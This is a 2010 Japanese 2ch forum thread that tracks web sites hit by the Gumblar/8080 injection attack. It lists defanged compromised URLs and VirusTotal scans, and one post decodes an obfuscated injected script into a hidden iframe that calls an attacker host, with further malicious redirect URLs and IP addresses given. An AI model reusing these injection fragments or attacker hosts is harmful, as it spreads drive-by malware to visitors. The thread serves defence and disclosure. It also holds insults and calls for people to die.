2010/03/27(土) 23:23:39基本を忘れちゃいかんよ
0437(VдV) ◆yUyb3Tqn92
2010/03/28(日) 04:48:29じゃなくて偉いこと!俺様にウィルス踏まされた馬鹿は
その経験のおかげでネット上で簡単にURLを踏む事の危険性に気づくってわけだ!
(VдV)┌ まぁ本当の馬鹿は何回も引っかかるけどな。
つまり
(V`д´V)俺様は反面教師、いや、必要悪を買って出てるってわけさ!
そして、それが俺様の人気の秘訣でもあるわけだ(Vд^)−☆ いつもブログに応援ありがとうねみんな!
0438名無しさん@お腹いっぱい。
2010/03/28(日) 06:37:53これ基本な
0439名無しさん@お腹いっぱい。
2010/03/28(日) 12:36:340440名無しさん@お腹いっぱい。
2010/03/28(日) 14:02:38だけどガンブラーをチェックするサイトでチェックしても出てこない。自分のPCが悪いの?
0441名無しさん@お腹いっぱい。
2010/03/28(日) 14:29:040442名無しさん@お腹いっぱい。
2010/03/28(日) 14:30:40どのチェックサイトを使ったんだよ
0443名無しさん@お腹いっぱい。
2010/03/28(日) 14:36:36>>5のチェックサイト全部。
8080って奴だと思う。
0444名無しさん@お腹いっぱい。
2010/03/28(日) 18:22:14それでないなら無いんじゃないの
0445名無しさん@お腹いっぱい。
2010/03/28(日) 19:15:050446名無しさん@お腹いっぱい。
2010/03/28(日) 19:52:360447名無しさん@お腹いっぱい。
2010/03/28(日) 20:08:550448名無しさん@お腹いっぱい。
2010/03/28(日) 21:02:19ttp://all-freesoft.net/v-kensyutsu/v-kensyutsu.html
■AV-Comparativesによるランク
★★★ G DATA・AVIRA・TrsutPort・PC Tools・Symantec・F-Secure・ESET
BitDefender・eScan・Avast・Kaspersky
★★ McAfee・Panda・Microsoft・Sophos・AVG
★ K7
ゼロ Norman・Trend Micro・Kingsoft
バスターとKingは(以下略
0449名無しさん@お腹いっぱい。
2010/03/28(日) 21:07:37誤検知を考えてもK7の方が上という罠
0450名無しさん@お腹いっぱい。
2010/03/29(月) 00:19:02ESET信者がセキュリティ板中に、VB100・AV-Comparatives・AV-Test.org等の
テスト結果コピペしていたのがバレてしまった瞬間。
http://pc11.2ch.net/test/read.cgi/sec/1207717191/47-49
0451名無しさん@お腹いっぱい。
2010/03/29(月) 00:31:074%ってPFWのことだろ?
ttp://www.matousec.com/projects/proactive-security-challenge/results.php
1本でおkの統合型はザルが多いからなw
0452名無しさん@お腹いっぱい。
2010/03/29(月) 00:46:21いい加減気づけよ
0453名無しさん@お腹いっぱい。
2010/03/29(月) 00:55:14と_,、⌒) )⌒) ) HIPSでーすイエーイ
(_ ノノ_ ノノ
0454名無しさん@お腹いっぱい。
2010/03/29(月) 04:57:00俺のサイトが改ざんされてた。どゆこと?
0455名無しさん@お腹いっぱい。
2010/03/29(月) 05:02:020456名無しさん@お腹いっぱい。
2010/03/29(月) 06:27:40http://www.jnews.com/
http://relaxsize.com/
この二つはもうウィルスじゃなくね?
え?直リンするよ?文句ある?じゃ死ねば?
0457名無しさん@お腹いっぱい。
2010/03/29(月) 08:04:100458名無しさん@お腹いっぱい。
2010/03/29(月) 08:27:19jnewsは直ってる
relaxsizeはまだ感染中
0459名無しさん@お腹いっぱい。
2010/03/29(月) 08:45:030460名無しさん@お腹いっぱい。
2010/03/29(月) 09:20:32今見たら直ってるな
キャッシュの罠か?
0461コテハン
2010/03/29(月) 09:35:08jnews.com/ぢゃなくてj-news.net/(苦笑)
で、そのj-news.net/から告知が出てた
ttp://www.j-news.net/infomation/
0462名無しさん@お腹いっぱい。
2010/03/29(月) 10:08:580463名無しさん@お腹いっぱい。
2010/03/29(月) 14:34:170464名無しさん@お腹いっぱい。
2010/03/29(月) 22:20:25分からなかったらとりあえずアンインスコしとけ
どうせ使わんだろその辺
0465名無しさん@お腹いっぱい。
2010/03/30(火) 02:43:58>つきましては、以下ウィルスの内容や対処方法などを記述します。
ヲイヲイ、バスターで駆除して終わりかよ。
それで済むんなら、サイト閉鎖する必要無いだろうが
0466名無しさん@お腹いっぱい。
2010/03/30(火) 03:01:43だな。 告知してるだけ「マシ」ってとこかな?
■サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2166
>8080のの攻撃では
〜〜中略〜〜
感染パソコンを感染前の状態に戻すのは、ほとんど絶望的と考えるのが賢明だ。
感染が確認された場合には、必要なデータをバックアップし、
OSを再インストールするのが確実な方法といえるだろう。
これを貼れば良いのに・・・
0467名無しさん@お腹いっぱい。
2010/03/30(火) 11:33:14貼ったら貼ったで今度は一般人から非難続出だろうね。
0468名無しさん@お腹いっぱい。
2010/03/30(火) 20:04:000469名無しさん@お腹いっぱい。
2010/03/30(火) 22:02:05mozilla add-ons の epdfを使っています。軽い。
0470名無しさん@お腹いっぱい。
2010/03/30(火) 22:54:38アンカーくらいちゃんと打ってください><
0471名無しさん@お腹いっぱい。
2010/03/31(水) 00:30:59は?なにいってんの
ちゃんとアンカされてるだろ
0472名無しさん@お腹いっぱい。
2010/03/31(水) 00:35:040473名無しさん@お腹いっぱい。
2010/03/31(水) 00:51:540474名無しさん@お腹いっぱい。
2010/03/31(水) 01:43:37数字を左クリックで選択反転させ、右クリックすると安価先がPOPされる
安価の>や<はもともとああいう使い方もしたようだが
ここは2chなので
0475名無しさん@お腹いっぱい。
2010/03/31(水) 01:48:210476名無しさん@お腹いっぱい。
2010/03/31(水) 01:51:51> 数字を左クリックで選択反転させ ×
数字を左ダブルクリックで選択反転させ ○
0477名無しさん@お腹いっぱい。
2010/03/31(水) 04:12:570478名無しさん@お腹いっぱい。
2010/03/31(水) 04:16:47ついでにIE8のセキュパッチもきてるぞ
0479名無しさん@お腹いっぱい。
2010/03/31(水) 09:10:03連日,相当 多数の皆さんが このページの駆除方法で
最低最悪のsecurity toolを駆除され,
再び 元通りにパソコンを使用出来たにも関わらず
ほとんどの皆さんから 何の喜びのメッセージをいただけません。
日本人の大人が,これほど礼儀知らずであったのでしょうか。
困っている場合に 手助けされる時,
お礼を言い合う習慣はなくなったのでしょうか。
私は 因みに 現在 64歳です。
http://8.pro.tok2.com/~miyuki-net-school/index.html
0480名無しさん@お腹いっぱい。
2010/03/31(水) 09:19:07前スレで出てたやつか
メールフォームから凸した人がいるが無視されてる
消去方法を削除してて、2000円払ったら教えるって書いてた時期もあった
間違いなく何言っても無駄だと思う
0481名無しさん@お腹いっぱい。
2010/03/31(水) 09:34:58だと思うがな
0482名無しさん@お腹いっぱい。
2010/03/31(水) 10:29:570483名無しさん@お腹いっぱい。
2010/03/31(水) 10:35:530484名無しさん@お腹いっぱい。
2010/03/31(水) 10:37:16どんだけ上から目線なんだよwww
0485名無しさん@お腹いっぱい。
2010/03/31(水) 10:40:19ここって感染サイトだったの?
0486名無しさん@お腹いっぱい。
2010/03/31(水) 11:20:58今イロイロ見てたら、このおじちゃん他人のブログやらOKやらで自分の駆除方法書きまくりじゃん。
0487名無しさん@お腹いっぱい。
2010/03/31(水) 11:23:010488名無しさん@お腹いっぱい。
2010/03/31(水) 11:24:530489名無しさん@お腹いっぱい。
2010/03/31(水) 11:44:24ささやかなお小遣いを希望される方に お奨めします。
0490名無しさん@お腹いっぱい。
2010/03/31(水) 11:45:380491名無しさん@お腹いっぱい。
2010/03/31(水) 11:59:430492名無しさん@お腹いっぱい。
2010/03/31(水) 13:27:45日本のつぶやきでも起こりそうだよね・・・
0493名無しさん@お腹いっぱい。
2010/03/31(水) 14:12:230494名無しさん@お腹いっぱい。
2010/03/31(水) 16:24:36ネット上からサイトごと消滅した方がいいと思う。
クリーンインストール前提で、必要なファイルのバックアップを取る為
「とりあえずマトモに動かせるようにする」と言う意味での
security tool削除ならわからなくもないが・・・
本体を殺してないのに「完全駆除」とは片腹痛いw
0495名無しさん@お腹いっぱい。
2010/03/31(水) 16:43:41前半の日本語の意味が分からない
後半は驚いて何もいえない
0496名無しさん@お腹いっぱい。
2010/03/31(水) 17:41:55こういうやつはウイルス流してるヤツらと同類だな
謝罪の為に首吊って死ぬべきだ
いや死ぬことすら生ぬるい
0497コテハン
2010/03/31(水) 21:21:10www●weekly-monthly●biz/
1件だけ投下・・・
0498名無しさん@お腹いっぱい。
2010/03/31(水) 21:47:140499名無しさん@お腹いっぱい。
2010/03/31(水) 22:29:20http://www.virustotal.com/jp/analisis/ebd3266daa5efdc32cbf5c28e92ba44ee2e4b27e52bb7909e49961de400e45ac-1270040161
http://www.virustotal.com/jp/analisis/ebd3266daa5efdc32cbf5c28e92ba44ee2e4b27e52bb7909e49961de400e45ac-1270040347
>>497
電凸完了
0500名無しさん@お腹いっぱい。
2010/03/31(水) 22:32:45もう対策されてるわ〜。
0501名無しさん@お腹いっぱい。
2010/04/01(木) 03:28:17http://www.virustotal.com/jp/analisis/f67be411f07ae4c9cb814111cd622875b58c607e38d30b373e6d9224a59a7fd9-1270059337
07/37
http://www.virustotal.com/jp/analisis/7aea9859778fd62be387bf5e2ed5efc3126ae5f7e094461d39956371a7ea4954-1270059628
0502コテハン ◆8080adndqg
2010/04/01(木) 11:31:03www●kadaru●mydns●to/ ←これやばくね?
www●jc-consulting●jp/ ←絶賛放置中
www●footsal-club●net/
0503コテハン ◆8080adndqg
2010/04/01(木) 11:40:22www●google●co●jp/search?hl=ja&source=hp&q=site%3Awww●kadaru●mydns●to&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
先生は絶賛スルー中...
0504コテハン ◆8080adndqg
2010/04/01(木) 13:23:51www●pokebai●net/
0505名無しさん@お腹いっぱい。
2010/04/01(木) 13:25:17vip.6to23.com/jogman←ビックリサイトのトップだが感染確認
0506コテハン ◆8080adndqg
2010/04/01(木) 14:29:59"refresh"に5連発
.は●にしてほしいのです・・・
--
【陥落サイトのURL悪用厳禁】
www●ed-shop●com/
・Gumblarっぽいやつ
・<script>c10z27・・・
※めんどくさいから調べてない
ねる...
0507名無しさん@お腹いっぱい。
2010/04/01(木) 14:44:02これはどこの記載で確認できるの?
0508名無しさん@お腹いっぱい。
2010/04/01(木) 16:53:550509名無しさん@お腹いっぱい。
2010/04/01(木) 17:36:24ブラクラ専用ノート作れ
0510名無しさん@お腹いっぱい。
2010/04/01(木) 17:43:030511名無しさん@お腹いっぱい。
2010/04/01(木) 17:52:250512名無しさん@お腹いっぱい。
2010/04/01(木) 19:06:50単純にJavascript切ればいいだけだアホ!
0513名無しさん@お腹いっぱい。
2010/04/01(木) 19:31:59AviraとMSEは地雷か
0514名無しさん@お腹いっぱい。
2010/04/01(木) 20:20:00そうNoScriptだな
0515名無しさん@お腹いっぱい。
2010/04/01(木) 20:52:56そして.htaccessを改ざんするタイプに引っかかって感染、と・・・
0516名無しさん@お腹いっぱい。
2010/04/01(木) 21:09:490517名無しさん@お腹いっぱい。
2010/04/01(木) 21:51:17煩わしさが半端ないから、よほど意志が強くない限りは続けられないと思うが。
0518名無しさん@お腹いっぱい。
2010/04/01(木) 22:36:46まさにそれやってるけど大して煩わしさ感じない
そんなにリダイレクトしまくりなのか?
0519名無しさん@お腹いっぱい。
2010/04/01(木) 22:43:37http://www.virustotal.com/jp/analisis/7378e619878ef1a422585f2b00cd59ef7d8508eb1d19713d7f75573344ffbd89-1270127899
kenichikaki●com
スタパン涙目
>>502
http://www.virustotal.com/jp/analisis/26bd267c6d3356a64d30e95e5ca2ed0066288ffe7f3ce0748abc02ca0edec0fc-1270129048
トレンドマイクロだと?
0520519
2010/04/01(木) 22:51:3010/42
http://www.virustotal.com/jp/analisis/26ae4dc8ed13843a5eba0195ad20ebaae717dfbe8e79e7c6664132b0e68079fb-1270129728
0521名無しさん@お腹いっぱい。
2010/04/01(木) 23:21:24ttp://blog.f-secure.jp/archives/50382769.html
0522名無しさん@お腹いっぱい。
2010/04/01(木) 23:43:20297B646F63756D656E742E777269746528756E65736361
7065282027253363253639253636253732253631
253664253635253230253665253631
253664253635253364253633253331
253330253230253733253732253633253364253237253638253734253734253730253361
253266253266253337253337253265253332253332253331
↓
){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%37%2e%32%32%31
↓
<iframe name=c10 src='http://77.221 〜
0523名無しさん@お腹いっぱい。
2010/04/01(木) 23:47:45http://safeweb.norton.com/report/show?url=77.221.153.178
0524名無しさん@お腹いっぱい。
2010/04/01(木) 23:59:110525名無しさん@お腹いっぱい。
2010/04/02(金) 00:09:410526名無しさん@お腹いっぱい。
2010/04/02(金) 01:46:302ch中が祭り状態だけどこれウイルス?
それともメッセの会社としての管理問題?
とにかく名前、TEL、メアドと大変だ
0527名無しさん@お腹いっぱい。
2010/04/02(金) 02:21:30流出の原因はシス管がうんこだから
0528名無しさん@お腹いっぱい。
2010/04/02(金) 03:34:07見たら近所の奴がいたw
0529名無しさん@お腹いっぱい。
2010/04/02(金) 04:20:36489 :名無しさん必死だな:2010/04/02(金) 04:14:02 ID:cjzI0flq0
319 名前: 厚揚げ(関東地方) 投稿日:2010/04/02(金) 03:53:06.39 ID:7g2sF8Sk
購入履歴のページもやばいが、ある語句をつけて検索すると、
会員ごとの個人情報を直接編集する「管理者向けページ」が山のように出てくる。
客から、住所変更の依頼を受けたときなんかに使うページなんだろう。
これをGoogleさまが、ご丁寧に全ページをキャッシュしている。
このページは、会員が自分で決めたパスワードがソースの中に丸出しになってるから、
平文のパスワードが個人情報とセットで流出・・・こりゃ前代未聞の流出事件じゃないか?
ていうか大前提として、客が入力した大切なパスワードを、平文で保存しちゃダメだろ。
エログッズの買ったものリスト、住所、氏名、電話、性別、生年月日、
自分で決めたパスワードがセットで流出って、被害甚大すぎるだろ・・・
被害者は、1秒でも早く、ネットで共通で使っているパスワードを変えるべき。
0530名無しさん@お腹いっぱい。
2010/04/02(金) 04:25:15>>489の続き
さらに、ある文字列で単純にGoogle検索するだけで、
買い物かごシステムの管理者用設定変更ページが、検索結果の1番目に出てくる。
これはシステム上のトップレベルの権限だから、ディレクトリから何まですべての設定が参照できてしまう。
しかも、設定ファイルの置き場所も問題で、会員情報の全員分っぽい大元のCSVファイルと
ロックファイルが、public_htmlの下にまるだしで、URLさえ知ったら誰でもアクセスできる場所に
置いてあるし。いくらなんでも最低レベルだ・・・ザルすぎだろ・・・
俺はアクセスしなかったが、csvは、ちゃんとhtaccessで制限かけてあるんだろうな?
万が一、かけてなかったら・・・いったいどこのテストサイトだよ
0531名無しさん@お腹いっぱい。
2010/04/02(金) 05:27:410532名無しさん@お腹いっぱい。
2010/04/02(金) 10:54:34一応アップデートしとくか
0533名無しさん@お腹いっぱい。
2010/04/02(金) 11:37:34http://blog.f-secure.jp/archives/50382418.html
0534名無しさん@お腹いっぱい。
2010/04/02(金) 12:30:04狂気だろw
0535名無しさん@お腹いっぱい。
2010/04/02(金) 12:41:07Gumblar/8080
http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
この2点でチェックだけでいいよな。>>1テンプレ次は修正すべき。
0536名無しさん@お腹いっぱい。
2010/04/02(金) 12:46:46それでもこっちよりはマシw
ttp://blog.f-secure.jp/archives/50382769.html
0537名無しさん@お腹いっぱい。
2010/04/02(金) 13:56:540538名無しさん@お腹いっぱい。
2010/04/02(金) 14:36:21Foxit Reader 3.2.1.0401で対応
警告ダイアログが出るようになった
0539名無しさん@お腹いっぱい。
2010/04/02(金) 16:16:210540名無しさん@お腹いっぱい。
2010/04/02(金) 16:23:230541名無しさん@お腹いっぱい。
2010/04/02(金) 17:46:41求人サイトからURLを踏む前にチェック入れるのが手間すぎる
0542名無しさん@お腹いっぱい。
2010/04/02(金) 17:57:25>>2
0543名無しさん@お腹いっぱい。
2010/04/02(金) 18:22:01さっさと捕まるか殺されるか自殺しとけよ
捕まったら死刑じゃすまねぇからな
0544名無しさん@お腹いっぱい。
2010/04/02(金) 18:49:430545名無しさん@お腹いっぱい。
2010/04/02(金) 18:52:29バカなのはわかったからとっとと>>2読め
0546名無しさん@お腹いっぱい。
2010/04/03(土) 03:53:19http://www.forest.impress.co.jp/lib/inet/security/antiadspy/secuniapsi.html
0547コテハン ◆8080adndqg
2010/04/03(土) 14:56:46www●mog-mmy●com/
www●ichiryuimono●com/
www●cashingalliance●com ←作りかけ放置?
※コードが途中で切れてるけど、いちおう...
www●tirashi●jp/ ←再掲載(絶賛放置中)
kadaru●mydns●to/tauchi-office/taikensyugi/ ←再掲載(絶賛放置中)
※kadaru●mydns●to/以下が全滅?
0548コテハン ◆8080adndqg
2010/04/03(土) 18:29:48www●babys-b●com/
0549名無しさん@お腹いっぱい。
2010/04/03(土) 19:00:12今アドレス送って掲示板に書き込めば403とか対処してくれるかも
0550名無しさん@お腹いっぱい。
2010/04/03(土) 22:24:48作りかけワロタwww
作者めまたやってくれましたな
0551名無しさん@お腹いっぱい。
2010/04/03(土) 22:26:33http://www.virustotal.com/jp/analisis/7378e619878ef1a422585f2b00cd59ef7d8508eb1d19713d7f75573344ffbd89-1270127899
http://www.virustotal.com/jp/analisis/26ae4dc8ed13843a5eba0195ad20ebaae717dfbe8e79e7c6664132b0e68079fb-1270129728
http://www.virustotal.com/jp/analisis/7aea9859778fd62be387bf5e2ed5efc3126ae5f7e094461d39956371a7ea4954-1270059628
http://www.virustotal.com/jp/analisis/f67be411f07ae4c9cb814111cd622875b58c607e38d30b373e6d9224a59a7fd9-1270059337
avast 4/4
Kaspersky 0/4
TrendMicro 3/4
0552名無しさん@お腹いっぱい。
2010/04/04(日) 01:52:23avast使いの人は検体送付してるよ(現に俺がそうだし)
キミがカスペ使いなら以下の検体を送付しる!
http://pc11.2ch.net/test/read.cgi/sec/1258817697/473
0553コテハン ◆8080adndqg
2010/04/04(日) 03:55:26【陥落サイトのURL悪用厳禁】
www●okjdr●com/
www●oracle-shop●net/
0554名無しさん@お腹いっぱい。
2010/04/04(日) 21:23:10www●golazo●jp/
0555名無しさん@お腹いっぱい。
2010/04/04(日) 21:42:03確認すた>>523だぬ。。。
0556名無しさん@お腹いっぱい。
2010/04/04(日) 21:48:330557名無しさん@お腹いっぱい。
2010/04/04(日) 21:57:25情報thxです
最近の傾向についていけてなかったんで自分で見てもわからなかったわ
aguse GWでなぜかyahoo●comのフレームが見えたのがそれのダミーだったんだね
0558名無しさん@お腹いっぱい。
2010/04/04(日) 22:04:43今の時点(こちらの環境)ではTOPのindexじゃなくて、他のindexが…
例: Last-Modified: Sun, 04 Apr 2010 03:34:43 GMT : i/index.html
c767c●c2>2w1>●61>5_3>●w1w7>8c/_g_o_2>/wicn6●wp6h>pw’.bZ(/[w¥>_6c]/g, ’
↓
77●221●153●178/go2/in●php
0559名無しさん@お腹いっぱい。
2010/04/04(日) 22:16:48なるほろthxです
<!-- ad -->になごんだ
しかしこっちもaguse GWだと見た目はyahoocomのフレームだね
0560名無しさん@お腹いっぱい。
2010/04/04(日) 22:20:38http://tsushima.2ch.net/test/read.cgi/news/1270379088/
こんな馬鹿もいるんだねw
0561名無しさん@お腹いっぱい。
2010/04/04(日) 22:23:54jsファイルに弄った跡がなさそうなのとtopのindexにはヤホー米やらなんやらと思ったらaguseでとtopにも>>523出たお。。。
0562名無しさん@お腹いっぱい。
2010/04/04(日) 22:33:33トップは拾えないなあ
0563名無しさん@お腹いっぱい。
2010/04/04(日) 22:43:52/mado/か!
>>561さんthxですた
0564コテハン ◆8080adndqg
2010/04/05(月) 14:34:45【陥落サイトのURL悪用厳禁】
デジタルアソシエーション株式会社
www●digital-as●co●jp/
\(^o^)/オワタ
0565名無しさん@お腹いっぱい。
2010/04/05(月) 14:40:35> ネットワークシステムの構築から開発、保守、運用に至るまで確実に進めて参ります。
> 常に、新しい技術を活用するに留まらず、経験あるスペシャリストが業務知識を十分駆使し、
> 課題の本質の調査、分析を徹底的に行うことから、始めます。
0566名無しさん@お腹いっぱい。
2010/04/05(月) 15:19:090567名無しさん@お腹いっぱい。
2010/04/05(月) 15:51:31>>566
凸おつ〜
0568名無しさん@お腹いっぱい。
2010/04/05(月) 19:26:130570名無しさん@お腹いっぱい。
2010/04/05(月) 20:50:13ついにセキュリティ関連企業までやられましたか
やれやれ
0571名無しさん@お腹いっぱい。
2010/04/05(月) 22:07:48再感染か修正漏れかしらないけれどダメだこりゃ。
www●digital-as●co●jp/service/index●html
0572名無しさん@お腹いっぱい。
2010/04/05(月) 22:40:48特に何ともないようだが
しかしトップページには何も告知が無い…さすがに出せないか
0573名無しさん@お腹いっぱい。
2010/04/05(月) 22:59:27/shared/openwin.js
ttp://www.virustotal.com/jp/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270456759
0574名無しさん@お腹いっぱい。
2010/04/05(月) 23:14:59もう修正されてるお。
Last-Modified: Mon, 05 Apr 2010 11:44:28 GMT
0576名無しさん@お腹いっぱい。
2010/04/05(月) 23:49:53Firefoxでwww●digital-as●co●jp/service/index●html
ソースの14行目の/shared/openwin.jsをクリック
ページをコピペしてvirustotalに投げてみそ
0577名無しさん@お腹いっぱい。
2010/04/05(月) 23:59:26http://www.kakiko.com/check/test.cgi?http%3A%2F%2Fwww%2Edigital%2Das%2Eco%2Ejp%2Fshared%2Fopenwin%2Ejs
http://rd.or.tp/get.php?site=http%3A%2F%2Fwww%2Edigital%2Das%2Eco%2Ejp%2Fshared%2Fopenwin%2Ejs&act=view
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fshared%2Fopenwin.js
キャッシュじゃにゃいのか?
http://online.us.drweb.com/result/?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fshared%2Fopenwin.js
>>573の修正後なぬで緑
0578名無しさん@お腹いっぱい。
2010/04/06(火) 00:16:17誰かが投げたの
http://www.virustotal.com/analisis/18f5d41467bfe3e00870d1e668df8f5fadec3bc0b041c8c97c1d78c14d39ae15-1270477188
File openwin.js received on 2010.04.05 14:19:48 (UTC)
Result: 0/39 (0.00%)
今、漏れが投げたの
http://www.virustotal.com/analisis/18f5d41467bfe3e00870d1e668df8f5fadec3bc0b041c8c97c1d78c14d39ae15-1270480147
File openwin.js received on 2010.04.05 15:09:07 (UTC)
Result: 0/39 (0%)
>>573はヒゲおじさんから次のうpだてで「Trojan.JS.Redirector.bt」だおって返事きてた。
かすぺユーザーは確認よろ。(VTは更新が遅いから)
0580名無しさん@お腹いっぱい。
2010/04/06(火) 01:13:33ノシ
時間も経ってるしとりあえず投げてみた。
http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270483429
File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
Result: 5/39 (12.82%)
まだ、更新されてないのね。
0581名無しさん@お腹いっぱい。
2010/04/06(火) 01:15:57× File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
○ File www.digital-as.co.jp.openwin.js received on 2010.04.05 16:03:49 (UTC)
0582名無しさん@お腹いっぱい。
2010/04/06(火) 01:18:59http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270455682
File www.digital-as.co.jp.index.html received on 2010.04.05 08:21:22 (UTC)
Result: 7/39 (17.95%)
↓
http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270483925
File www.digital-as.co.jp.index.html received on 2010.04.05 16:12:05 (UTC)
Result: 7/39 (17.95%)
0583名無しさん@お腹いっぱい。
2010/04/06(火) 01:32:58ありがたやありがたや
0584名無しさん@お腹いっぱい。
2010/04/06(火) 02:19:15こんなところを見てる暇があったら「告知(お詫び)」書け。
■サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
ttp://www.so-net.ne.jp/security/news/library/2112.html
>改ざんされたサイトを閲覧し、不幸にもウイルスに感染してしまった人たちは、
あなた方が知らせなければ、今も感染に気付かないままでいる可能性が高いのだ。
>Webサイトの管理者や運営者の方たちは、できるだけ迅速に改ざんされていた期間と場所を告知し、
この負の連鎖を断ち切れるよう尽力いただきたい。
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
報告もしろよ>digital-asの糞シス管
0585名無しさん@お腹いっぱい。
2010/04/06(火) 03:19:03>>566さんとは別に漏れもめるぽした時にセキュリティ通信のそのアドレスも含めて送ったお。
toで同時に送ったCPIからは返事きてた。
JPCERT/CCにはccで同時に送ったお。
デジタルアソシエーション 株式会社 にはせめてIPAに自社のホームページが改竄を受けてトロイをばら撒いていたことを自己申告してほしい。
γ⌒ヽ
< ・、,,,;;,) ハ,,..,,ハ
< つ=つ /;;・ω・;;ヽ
ノ ノ三) (;( ^^^ );)
∠、 m)=m) `'ー---‐´
いかんな、もう修正されたしいい加減スルーするとこだけど>>565だからなぁ…
0586名無しさん@お腹いっぱい。
2010/04/06(火) 04:37:15【主な取引先】
NECシステムテクノロジー株式会社
株式会社NTTデータアウラ
株式会社NTTデータ関西
株式会社大阪第一食糧
京セラ コミュニケーションシステム株式会社
スミセイ情報システム株式会社
住友化学システムサービス株式会社
デジタルプロセス株式会社
ニッセイ情報テクノロジー株式会社
日本電話施設株式会社
パナソニックAVCマルチメディアソフト株式会社
株式会社日立システムアンドサービス
株式会社富士通九州システムズ
富士通テン株式会社
富士電機ITセンター株式会社
三井情報株式会社
安川情報システム株式会社
日本アイ・ビー・エム株式会社
みずほ銀行
三井住友銀行
りそな銀行
上記の企業を相手に商売してて「逃げ(告知無し)」がバレたら
倒産フラグ成立間違いなしだろうなw
0587名無しさん@お腹いっぱい。
2010/04/06(火) 04:47:17( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
http://www.nca.gr.jp/member/index.html
ここの会員でJPCERT/CCから情報の共有があって、関連会社との連携が深ければ ぁぅぁぅ
0588名無しさん@お腹いっぱい。
2010/04/06(火) 09:46:26どうせ特定派遣で人材出してるだけだろうから
派遣されてるヤツが派遣先で問題起こしたとかじゃなければあんまり影響ないよ。
取引先のWebサイトとかを制作してたとか、
顧客のPCをGumbler攻撃で感染させちゃったとかなら契約切られる可能性もあるが…
0589名無しさん@お腹いっぱい。
2010/04/06(火) 11:46:37信用不安になるからそれなりに効果ありそうだけどね。
0590名無しさん@お腹いっぱい。
2010/04/06(火) 11:51:420591名無しさん@お腹いっぱい。
2010/04/06(火) 12:02:14融資銀行だって取引先に書くだろうし、この程度で信用不安になるなら
もっとマスコミが騒ぎ立てるだろ…
0592コテハン ◆8080adndqg
2010/04/06(火) 12:56:51中途半端なコード撤去、再改竄、絶賛放置中とか・・・
posh-e●com/index10●htm
pacific-staff●net/
hoikuen●19th●org/
cre2cash●2pg●in/ ←朝日オート(sunrise●2pg●in/)と同じく<!--<script>-->
0593名無しさん@お腹いっぱい。
2010/04/06(火) 13:00:55コメントアウトとかアホな対応してるな…
0594名無しさん@お腹いっぱい。
2010/04/06(火) 13:26:54これって一応、無効化してるんだ
0595名無しさん@お腹いっぱい。
2010/04/06(火) 19:22:28醤油みてる最中だけど新型?
> hoikuen●19th●org/
bestdarkstar●info:8080
0596名無しさん@お腹いっぱい。
2010/04/06(火) 19:32:5891.121.117.37
gnomeさんとこで確認すた。。。
0597名無しさん@お腹いっぱい。
2010/04/06(火) 19:34:59これもgnomeさんとこで確認
0598名無しさん@お腹いっぱい。
2010/04/06(火) 19:43:41あーーっ!
> hoikuen●19th●org/
http://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
.info 浸食
0599名無しさん@お腹いっぱい。
2010/04/06(火) 19:43:52<img width=1 height=1 alt="" src="http://b3.yahoo.co.jp/b?P=
FBGG7XxTw7GuMbELS3k.QhJAeWYvBUu7D_gAAyR9&T=13vm0jrtv%2fX%3d1270
550520%2fE%3d2079744651%2fR%3djp_r25%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY
%3djp%2fF%3d3785814215%2fQ%3d-1%2fS%3d1%2fJ%3d52C3537C"></div></no
script>
これは?
0600名無しさん@お腹いっぱい。
2010/04/06(火) 20:00:10かぶった
>>597
いまはこの5個セット
195.160.200.36 GB:AS44949 (GIGACODES)
77.241.93.114 BE:AS34762 (COMBELL)
91.121.117.37 FR:AS16276 (OVH)
91.121.169.6 FR:AS16276 (OVH)
94.23.159.128 FR:AS16276 (OVH)
OVH死ねよ
0601名無しさん@お腹いっぱい。
2010/04/06(火) 20:06:28ビーコン用GIFかな
0602名無しさん@お腹いっぱい。
2010/04/06(火) 20:37:10sunrise●2pg●inも変わってる
-> snoreflash●ru:8080
0603名無しさん@お腹いっぱい。
2010/04/06(火) 20:44:20>>602ソースアーカイブでけんかった。。。orz....
0605名無しさん@お腹いっぱい。
2010/04/06(火) 21:55:01.ruドメイン管理厳格化の影響だな
次は.infoか…
0606名無しさん@お腹いっぱい。
2010/04/06(火) 22:10:45【お詫び】ホームページ改ざん被害について
Last-Modified: Tue, 06 Apr 2010 12:53:17 GMT ttp://www.digital-as.co.jp/newstopics/2010/04/post-8.html
0607名無しさん@お腹いっぱい。
2010/04/06(火) 22:23:39これ、説明として正しいのか?
自分とこの管理用PCが感染して、それでサイト更新しただけだろ?
0608名無しさん@お腹いっぱい。
2010/04/06(火) 22:38:51他にもあるんじゃなかろうか
まあでも一応不正アクセスではあるんじゃね
広義では、管理者の意図しないアクセス=不正アクセスらしいからな
0609名無しさん@お腹いっぱい。
2010/04/06(火) 23:00:320610名無しさん@お腹いっぱい。
2010/04/06(火) 23:22:46>>573-582あたりの続き
http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270563397
File www.digital-as.co.jp.openwin.js received on 2010.04.06 14:16:37 (UTC)
Result: 7/38 (18.43%)
